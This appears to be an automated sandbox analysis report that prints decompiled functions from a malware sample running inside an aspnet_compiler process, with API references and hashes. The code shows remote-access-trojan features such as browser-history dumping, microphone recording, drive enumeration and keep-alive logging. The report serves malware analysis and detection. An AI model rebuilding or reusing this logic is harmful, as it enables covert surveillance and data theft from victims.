                    • API String ID: 4116985748-0
                    • Opcode ID: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                    • Instruction ID: db9294b6453bfed66dbe03807c9cf0078fbbbbfeeb63ddf2ed7e0e7c3359cc27
                    • Opcode Fuzzy Hash: 52ae23f17ebd3a8b63732ffffa837f2ae29638f7e606c1416d1229424adc30c0
                    • Instruction Fuzzy Hash: 85F0AFB1B483165FD700EFB69C45A6B7AE59BD42A4F10043FF608C7281EEACDC458B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00437801() {
                    				void* _t4;
                    				void* _t8;
                    
                    				E00438C10();
                    				E00437795();
                    				if(E00438D37() != 0) {
                    					_t4 = E00438CE9(_t8, __eflags);
                    					__eflags = _t4;
                    					if(_t4 != 0) {
                    						return 1;
                    					} else {
                    						E00438D73();
                    						goto L1;
                    					}
                    				} else {
                    					L1:
                    					return 0;
                    				}
                    			}






                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00437801
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00437806
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043780B
                      • Part of subcall function 00438D37: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00438D48
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00437820
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                    • Instruction ID: 44b38c586fa46ca64db38af4dc09b646a72d0231a99fa094af013a7d49b3c72a
                    • Opcode Fuzzy Hash: 9269abf3446c0c407ed1a2d4036da59c5190ee49ce07a04b16f4a94a6885d453
                    • Instruction Fuzzy Hash: 5DC00298409781141D383A7311461AE93002C6E3CDF8078DFFAE0175435D0E140B957E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004415BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                    • Instruction ID: 9bdf7c23e7d16313cb1f45f597b7cc27bb5148f7337d60067ed22a22280059c4
                    • Opcode Fuzzy Hash: ad63ff09f6cf6b628e32c74312707c4078ff81d5a8f2d6bafb9ca103f79419f4
                    • Instruction Fuzzy Hash: C4514C61E06201A7F7517714C9813BB2B94DB80741F28896BF0D6823BAEB3DCCD59E4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00420387(void* __ecx) {
                    				signed int _t92;
                    				signed int _t93;
                    				intOrPtr _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				void* _t100;
                    				signed int _t124;
                    				signed int _t130;
                    				signed int _t134;
                    				void* _t142;
                    				signed int _t148;
                    				void* _t151;
                    				signed int _t153;
                    				signed int _t154;
                    				signed int _t162;
                    				signed int _t165;
                    				signed int _t166;
                    				signed int _t169;
                    				signed int _t172;
                    				signed int _t174;
                    				signed int _t175;
                    				signed int* _t177;
                    				signed int* _t178;
                    				signed int* _t179;
                    				signed int* _t180;
                    
                    				 *_t177 =  *_t177 & 0x00000000;
                    				_t142 = __ecx;
                    				_t92 =  *(__ecx + 0x310) & 0x0000ffff;
                    				if((_t92 & 0x00000004) == 0) {
                    					if((_t92 & 0x00001000) == 0) {
                    						goto L1;
                    					}
                    					_t94 =  *((intOrPtr*)(__ecx + 8));
                    					if(_t94 == 0) {
                    						L26:
                    						_t93 = 0xffffff53;
                    						L27:
                    						return _t93;
                    					}
                    					_t95 = _t94 + 0x54;
                    					_t177[6] = _t95;
                    					if(_t95 == 0) {
                    						goto L26;
                    					}
                    					_push( &(_t177[3]));
                    					_t96 = E0042035E(_t95, 0x20);
                    					_t169 = _t177[4];
                    					_t148 = 0xb;
                    					_t165 = _t96 % _t148;
                    					_t177[7] = _t165;
                    					if(_t169 == 0) {
                    						if(E00432AE1(0x474a44) == 0) {
                    							_t174 = 0;
                    							_t166 = _t165 * 0x170;
                    							_t177[5] = 0;
                    							_t16 = _t166 + 0x473990; // 0x473990
                    							_t99 = _t16;
                    							_t177[6] = _t16;
                    							while(1) {
                    								_t100 = E004358BA(_t177[9], _t99, 0x20);
                    								_t177 =  &(_t177[3]);
                    								if(_t100 == 0) {
                    									break;
                    								}
                    								_t174 = _t174 + 1;
                    								_t99 = _t177[6] + 0x78;
                    								_t177[5] = _t174;
                    								_t177[6] = _t177[6] + 0x78;
                    								if(_t174 < 3) {
                    									continue;
                    								}
                    								_t174 =  *(_t166 + 0x473980);
                    								_t177[5] = _t174;
                    								 *(_t166 + 0x473980) = _t174 + 1;
                    								break;
                    							}
                    							_t175 = _t174 * 0x78;
                    							_push(0x30);
                    							if( *(_t142 + 0x310) < 0x8000) {
                    								_push( *((intOrPtr*)(_t142 + 8)) + 0xa5);
                    								_t32 = _t166 + 0x4739b1; // 0x4739b1
                    								_push(_t32 + _t175);
                    								E004351E0();
                    								 *((char*)(_t166 + _t175 + 0x4739b0)) =  *((intOrPtr*)( *((intOrPtr*)(_t142 + 8)) + 0x74));
                    							} else {
                    								_push(_t142 + 0x199);
                    								_t28 = _t166 + 0x4739b1; // 0x4739b1
                    								_push(_t28 + _t175);
                    								E004351E0();
                    								 *((char*)(_t166 + _t175 + 0x4739b0)) = 0x20;
                    							}
                    							_t178 =  &(_t177[3]);
                    							_t37 = _t166 + 0x473990; // 0x473990
                    							E004351E0(_t37 + _t175, _t178[8], 0x20);
                    							_t179 =  &(_t178[3]);
                    							 *(_t166 + _t175 + 0x4739e2) =  *(_t142 + 0x314) >> 0x00000009 & 0x00000001;
                    							 *((intOrPtr*)(_t166 + _t175 + 0x47398c)) =  *((intOrPtr*)(_t142 + 0x20c));
                    							 *((intOrPtr*)(_t166 + _t175 + 0x473988)) = E0041D039(0x474a44);
                    							 *((char*)(_t166 + _t175 + 0x4739e4)) =  *((intOrPtr*)(_t142 + 0x317));
                    							 *((char*)(_t166 + _t175 + 0x4739e5)) =  *((intOrPtr*)(_t142 + 0x318));
                    							 *((short*)(_t166 + _t175 + 0x4739fc)) =  *((intOrPtr*)(_t142 + 0x1e4));
                    							 *((intOrPtr*)(_t166 + 0x473984)) =  *((intOrPtr*)(_t166 + 0x473984)) + 1;
                    							if( *(_t166 + 0x473980) == 3) {
                    								 *(_t166 + 0x473980) =  *(_t166 + 0x473980) & 0x00000000;
                    							}
                    							if(( *(_t142 + 0x310) & 0x00000030) != 0x10) {
                    								L25:
                    								 *(_t166 + _t175 + 0x4739e6) = 0;
                    								goto L24;
                    							} else {
                    								_t124 =  *(_t142 + 0x1ce) & 0x0000ffff;
                    								if(_t124 == 0) {
                    									goto L25;
                    								}
                    								 *(_t166 + _t175 + 0x4739e6) = _t124;
                    								_t67 = _t166 + 0x4739e8; // 0x4739e8
                    								E004351E0(_t67 + _t175, _t142 + 0x1d0,  *(_t142 + 0x1ce) & 0x0000ffff);
                    								_t130 = E0042035E(_t142 + 0x1d0,  &(_t179[7]));
                    								_t169 = _t179[8];
                    								_t180 =  &(_t179[4]);
                    								_t153 = 0xb;
                    								_t162 = _t130 % _t153;
                    								if(_t169 == 0) {
                    									_t172 = _t162 * 0x14;
                    									_t154 =  *(_t172 + 0x474950);
                    									 *(_t172 + 0x474950) = _t154 + 1;
                    									_t134 = _t162 * 5 + _t154;
                    									 *((short*)(0x474958 + _t134 * 4)) = _t180[8];
                    									 *((short*)(0x47495a + _t134 * 4)) = _t180[5];
                    									 *((intOrPtr*)(_t172 + 0x474954)) =  *((intOrPtr*)(_t172 + 0x474954)) + 1;
                    									if( *(_t172 + 0x474950) == 3) {
                    										 *(_t172 + 0x474950) =  *(_t172 + 0x474950) & 0x00000000;
                    									}
                    									_t169 = _t180[4];
                    								}
                    								L24:
                    								E00432AEB(0x474a44);
                    								_t151 = 0xffffff96;
                    								_t170 =  !=  ? _t151 : _t169;
                    								_t93 =  !=  ? _t151 : _t169;
                    								goto L27;
                    							}
                    						}
                    						_t93 = 0xffffff96;
                    						goto L27;
                    					}
                    					_t93 = _t169;
                    					goto L27;
                    				}
                    				L1:
                    				_t93 = 0;
                    				goto L27;
                    			}

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: DJG$DJG
                    • API String ID: 0-3553971598
                    • Opcode ID: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                    • Instruction ID: f2201e53aae1a578f399186880d4f81f94f4690d310475270f371cf99ab1fffa
                    • Opcode Fuzzy Hash: e8c7b146054ac432a77ccc8b031f1909a635b70973a3760844eb4ba0b5c61c59
                    • Instruction Fuzzy Hash: 8861F0F16046569BC704DF28D8017A6F7E4FF84304F04052EED9C8B346E778AA64DBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040402C(void* __ebx) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				short _v692;
                    				void* __edi;
                    				void* __ebp;
                    				struct HINSTANCE__* _t81;
                    				struct HINSTANCE__* _t84;
                    				void* _t85;
                    				void* _t86;
                    
                    				_t48 = __ebx;
                    				_t81 = 0;
                    				GetModuleFileNameW(0,  &_v692, 0x104);
                    				E004020BF(__ebx,  &_v52);
                    				E0040CEEC( &_v28, 0x30, E00401F8B(E0041A4D3( &_v76)));
                    				E00401FB8();
                    				E00401F8B(0x472e18);
                    				E00417456(E00401EE4(E00402FF4(_t48,  &_v100, E004042FD(_t48,  &_v124, E004042DC(_t48,  &_v148,  &_v692, _t85, 0, E0040415E(__ebx,  &_v172, 0x30, _t85, L" /sort \"Visit Time\" /stext \"")), _t85, 0,  &_v28), 0, _t85, 0, "\"")));
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401EE9();
                    				_t84 = 0;
                    				while(1) {
                    					E00401EE4( &_v28);
                    					_t80 =  &_v52;
                    					if(E0041ADFE( &_v52) != 0) {
                    						break;
                    					}
                    					Sleep(0xfa);
                    					_t84 =  &(_t84->i);
                    					if(_t84 < 0x14) {
                    						continue;
                    					} else {
                    					}
                    					L5:
                    					E00401EE9();
                    					E00401FB8();
                    					return _t81;
                    				}
                    				E004020D6(_t48, _t86 - 0x18,  &_v52, __eflags,  &_v52);
                    				_push(0x9d);
                    				E00404A81(0x472d98, _t80, __eflags);
                    				_t81 = 1;
                    				__eflags = 1;
                    				goto L5;
                    			}

                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                      • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                      • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                      • Part of subcall function 0041ADFE: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409DB6), ref: 0041AE17
                    • Sleep.KERNEL32(000000FA,00463E44), ref: 00404118
                    Strings
                    • /sort "Visit Time" /stext ", xrefs: 00404092
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "
                    • API String ID: 368326130-1573945896
                    • Opcode ID: 2eac5f177e38ba3d5510b66f3c4a351a846c2765b6f392dade71e2eaa4fc0a08
                    • Instruction ID: 0b16387c6f9edcb84504e01d0cc383686463f04b1c5a299ba0a956b40ef645a0
                    • Opcode Fuzzy Hash: 2eac5f177e38ba3d5510b66f3c4a351a846c2765b6f392dade71e2eaa4fc0a08
                    • Instruction Fuzzy Hash: B7318431A0021957CB14FBA6DC969EE7779AF90308F40017FF506B71D2EF38598ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E004503B7(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				int _v8;
                    				void* __esi;
                    				int _t15;
                    				int _t16;
                    				signed int _t17;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t34;
                    				intOrPtr* _t36;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				_push(_t34);
                    				if(_t23 == 0) {
                    					L21:
                    					_t15 = E0044716D(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                    					__eflags = _t15;
                    					if(_t15 != 0) {
                    						_t16 = _v8;
                    						__eflags = _t16;
                    						if(_t16 == 0) {
                    							_t16 = GetACP();
                    						}
                    						L25:
                    						return _t16;
                    					}
                    					L22:
                    					_t16 = 0;
                    					goto L25;
                    				}
                    				_t17 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t34 = 0x45e318;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t34) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t17;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t36 = 0x45e320;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t36) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								_t48 = _t17;
                    								if(_t17 != 0) {
                    									_t16 = E0043A382(_t23, _t23);
                    									goto L25;
                    								}
                    								if(E0044716D(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t16 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t36 = _t36 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t17 = _t17 | 0x00000001;
                    						__eflags = _t17;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t34 = _t34 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				__eflags = _t26;
                    				goto L9;
                    			}

                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450612,?,00000050,?,?,?,?,?), ref: 00450492
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                    • Instruction ID: b93994b24156d93d71cef3ddff737944661d95d4cf4e28bf2754044b1fc000f2
                    • Opcode Fuzzy Hash: f1c7551b471a892f553800437845e87fa4d211da0bcbbc8f051b82ee5a92802c
                    • Instruction Fuzzy Hash: 0521066AA00100A6DB34CA54C901B9B7356DF52B57F56842AEF0AD7303F73ADD4AC358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00404FD4(intOrPtr _a4) {
                    				char _v24;
                    				void* _v28;
                    				struct _SYSTEMTIME _v40;
                    				void* __ebx;
                    				void* __ebp;
                    				void* _t11;
                    				void* _t17;
                    				void* _t35;
                    				intOrPtr _t36;
                    				void* _t38;
                    				void* _t42;
                    				void* _t43;
                    
                    				if( *0x473544 == 0) {
                    					__eflags = 0;
                    					return 0;
                    				}
                    				_t36 = _a4;
                    				if( *0x470d48 == 0) {
                    					L7:
                    					 *0x473560 =  *0x473560 & 0x00000000;
                    					 *0x473565 = 1;
                    					 *0x47355c = _t36;
                    					return 1;
                    				}
                    				_t46 =  *0x473564;
                    				_t22 = "KeepAlive             | Enabled | Timeout: ";
                    				_t37 = "i";
                    				if( *0x473564 != 0) {
                    					GetLocalTime( &_v40);
                    					_t17 = E0041A6E9("KeepAlive             | Enabled | Timeout: ",  &_v24, _t36);
                    					_t42 = _t38 - 0x18;
                    					E004052DD(_t22, _t42, _t22, "i", _t46, _t17);
                    					_t43 = _t42 - 0x14;
                    					E00402073(_t22, _t43, _t22, "i", _t37);
                    					E0041A04A(_t22, _t35);
                    					_t38 = _t43 + 0x30;
                    					E00401FB8();
                    					 *0x473564 = 0;
                    				}
                    				if( *0x47355c != _t36) {
                    					_t48 =  *0x473565;
                    					if( *0x473565 != 0) {
                    						GetLocalTime( &_v40);
                    						_t11 = E0041A6E9(_t22,  &_v24, _t36);
                    						_t39 = _t38 - 0x18;
                    						E004052DD(_t22, _t38 - 0x18, _t22, _t37, _t48, _t11);
                    						E00402073(_t22, _t39 - 0x14, _t22, _t37, _t37);
                    						E0041A04A(_t22, _t35);
                    						E00401FB8();
                    					}
                    				}
                    				goto L7;
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405010
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetLocalTime.KERNEL32(?,004734E8,?,00000000,?,?,?,?,?,?,00415007,?,00000001,0000004C,00000000), ref: 00405067
                    Strings
                    • KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: KeepAlive | Enabled | Timeout:
                    • API String ID: 481472006-1507639952
                    • Opcode ID: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                    • Instruction ID: 9a4cfd33936eaa6b36ea74c7cc729b7cf4cbb54b4ad27954b172034734b4d9a3
                    • Opcode Fuzzy Hash: f6f4986efb37b8d342486ec4eef68092672092b0f0007e9071cdaf16fe546712
                    • Instruction Fuzzy Hash: AC2129719043806BD714FB25DC4575F7B54AB45309F04057EF485532A2DA3D5688CBEB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0041A04A(void* __ebx, void* __edi, char _a4, char _a28) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				signed short _v102;
                    				signed short _v104;
                    				signed short _v106;
                    				signed short _v108;
                    				void* __ebp;
                    				void* _t57;
                    				signed int _t58;
                    				struct _SYSTEMTIME* _t60;
                    
                    				_t60 = (_t58 & 0xfffffff8) - 0x70;
                    				_t62 =  *0x470d48;
                    				if( *0x470d48 != 0) {
                    					GetLocalTime(_t60);
                    					_push(_v102 & 0x0000ffff);
                    					_push(_v104 & 0x0000ffff);
                    					_push(_v106 & 0x0000ffff);
                    					E00406874(_t62, E00401F8B(E00408832(__ebx,  &_v100, E00402EF0(__ebx,  &_v76, E00408832(__ebx,  &_v52, E004052FE( &_v28, "%02i:%02i:%02i:%03i ", _t57,  &_a4), __edi, _t57, _t62, " | "), _t57, _t62,  &_a28), __edi, _t57, _t62, "\n")), _v108 & 0x0000ffff);
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    					E00401FB8();
                    				}
                    				E00401FB8();
                    				return E00401FB8();
                    			}

                    APIs
                    • GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: LocalTime
                    • String ID: | $%02i:%02i:%02i:%03i
                    • API String ID: 481472006-2430845779
                    • Opcode ID: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                    • Instruction ID: 305aa241e5e1249f2c56a36f0bedab380cdf1516fdeeb0388db8af3b2f80b87a
                    • Opcode Fuzzy Hash: 73f1784e6b0f8c6c2b56327e02b954a3cae6b777a92ff4e659f5f7ca666b0f94
                    • Instruction Fuzzy Hash: DD11637250820156C704FBA5D841CAFB3E8AF84348F504A3FF485A21E1EF3CD945CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E004016EF(signed int __ecx, unsigned int __edx, void* __edi, void* __esi, void* __ebp, char _a8) {
                    				signed int _v0;
                    				char _v20;
                    				void* __ebx;
                    				signed int _t19;
                    				signed int _t20;
                    				void* _t21;
                    				signed int _t29;
                    				unsigned int _t30;
                    				long _t37;
                    				signed int _t40;
                    
                    				E00401FA0(0x472d74,  &_a8);
                    				_t29 = _v0;
                    				0x470aa8->wFormatTag = 1;
                    				_t19 = (__edx & 0x0000ffff) >> 3;
                    				asm("movd xmm0, edx");
                    				asm("cvtdq2pd xmm0, xmm0");
                    				 *0x470aac = _t29;
                    				 *0x470ab6 = __edx;
                    				_t30 = _t29 >> 0x1f;
                    				 *0x470aaa = __ecx;
                    				asm("addsd xmm0, [edx*8+0x46b1e0]");
                    				 *0x470ab0 = (__ecx & 0x0000ffff) * _t19 * _t29;
                    				_t37 = 0;
                    				 *0x470ab8 = 0;
                    				asm("cvtpd2ps xmm0, xmm0");
                    				 *0x470ab4 = (__edx >> 0x00000003 & 0x0000ffff) * (__ecx & 0x0000ffff);
                    				asm("mulss xmm0, [0x46b18c]");
                    				asm("cvttss2si eax, xmm0");
                    				_t20 = _t19 * 0;
                    				_t40 = _t20;
                    				 *0x470abc = 0;
                    				 *0x470a80 = _t20;
                    				waveInOpen(0x470ac8, 0xffffffff, 0x470aa8, 0x40184a, 0, 0x30008);
                    				do {
                    					E004017CC(_t37, _t30, _t40);
                    					_t37 = _t37 + 1;
                    				} while (_t37 < 2);
                    				waveInStart( *0x470ac8);
                    				_pop(_t21);
                    				return E004023AE(_t21,  &_v20, __ebp, 1, 0);
                    			}

                    APIs
                    • waveInOpen.WINMM(00470AC8,000000FF,00470AA8,0040184A,00000000,00030008,?), ref: 004017A1
                      • Part of subcall function 004017CC: waveInPrepareHeader.WINMM(?,00000020,00000000,00000000,?,00000000,?,?,004017AE), ref: 00401829
                      • Part of subcall function 004017CC: waveInAddBuffer.WINMM(?,00000020,?,00000000,?,?,004017AE), ref: 0040183F
                    • waveInStart.WINMM ref: 004017BA
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferHeaderOpenPrepareStart
                    • String ID: t-G
                    • API String ID: 4183526013-1680578370
                    • Opcode ID: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                    • Instruction ID: 95a711b6e76d91f395065626d5ac92766c974447fb9b8fe42a04c668eb71b703
                    • Opcode Fuzzy Hash: 3d24f6267b8bac03b3880ecd6faf7845489f839e1f41d23f6f3b62a1441da131
                    • Instruction Fuzzy Hash: 1E110071A15310DEC359DB35AC40956B6E8EFAA365B10823BE04AE72F0E7384480C75C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407121(void* __ebx, void* __ecx, void* __edx, char _a4) {
                    				char _v8;
                    				char _v32;
                    				char _v56;
                    				char _v80;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				CHAR* _t43;
                    				void* _t45;
                    				void* _t46;
                    				void* _t47;
                    
                    				_t41 = __edx;
                    				_t28 = __ebx;
                    				_t45 = __ecx;
                    				E004020BF(__ebx, __ecx);
                    				_t1 =  &_a4; // 0x40793a
                    				_t30 = _t1;
                    				_t43 = E00401F8B(_t1);
                    				while( *_t43 != 0) {
                    					E00440751(_t30, GetDriveTypeA(_t43),  &_v8, 0xa);
                    					_t47 = _t47 + 0xc;
                    					_t41 = E00406292( &_v56, _t45, _t46, E00401F8B(E00402073(_t28,  &_v80, _t41, _t46,  &_v8)));
                    					E00401FC2(_t45, _t19, _t45, E00408853(_t28,  &_v32, _t19, _t43, _t46, __eflags, 0x2d));
                    					E00401FB8();
                    					E00401FB8();
                    					_t30 =  &_v80;
                    					E00401FB8();
                    					_t43 =  &(( &(_t43[1]))[lstrlenA(_t43)]);
                    					__eflags = _t43;
                    				}
                    				E00401FB8();
                    				return _t45;
                    			}

                    APIs
                    • GetDriveTypeA.KERNEL32(00000000,?,0000000A,00472EC8,?), ref: 00407143
                    • lstrlenA.KERNEL32(00000000,00000000,0000002D), ref: 0040719F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DriveTypelstrlen
                    • String ID: :y@
                    • API String ID: 1700768220-1587296891
                    • Opcode ID: 563eb0879e7524069d83ee93026c2b57bc0f6a3de0865c919f7779aa4d97f8f5
                    • Instruction ID: c00c3adc2f199bda80f2beeafe438d8d3b09a9202e04ec6dc2608c4f95599cd9
                    • Opcode Fuzzy Hash: 563eb0879e7524069d83ee93026c2b57bc0f6a3de0865c919f7779aa4d97f8f5
                    • Instruction Fuzzy Hash: 1D018231E041096ACB04F7A5EC96EADB76C9F90344F50417FF406B21E1EF789A06C699
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0040B6DC(signed int __edx) {
                    				char _v8;
                    				void* __ecx;
                    				void* _t6;
                    				char _t15;
                    
                    				_push(_t15);
                    				 *0x470b19 = _t15;
                    				 *0x470b28 = __edx * 0xea60;
                    				if(_t15 == 0) {
                    					L4:
                    					CreateThread(0, 0, E0040B586, 0, 0, 0);
                    					_t6 = 1;
                    				} else {
                    					_t26 = "FR";
                    					_v8 = 0;
                    					if(E004127E7(0x473238, E00401F8B(0x473238), "FR") == 0) {
                    						goto L4;
                    					} else {
                    						E00412831(E00401F8B(0x473238), _t26,  &_v8);
                    						if(_v8 == 0) {
                    							goto L4;
                    						} else {
                    							_t6 = 0;
                    						}
                    					}
                    				}
                    				return _t6;
                    			}

                    APIs
                    • CreateThread.KERNEL32 ref: 0040B743
                      • Part of subcall function 004127E7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B716,00464C08), ref: 004127FE
                      • Part of subcall function 004127E7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B716,00464C08), ref: 00412812
                      • Part of subcall function 004127E7: RegCloseKey.KERNELBASE(?,?,?,0040B716,00464C08), ref: 0041281D
                      • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                      • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                      • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue$CreateThread
                    • String ID: 82G$Cqt
                    • API String ID: 3520877709-164559435
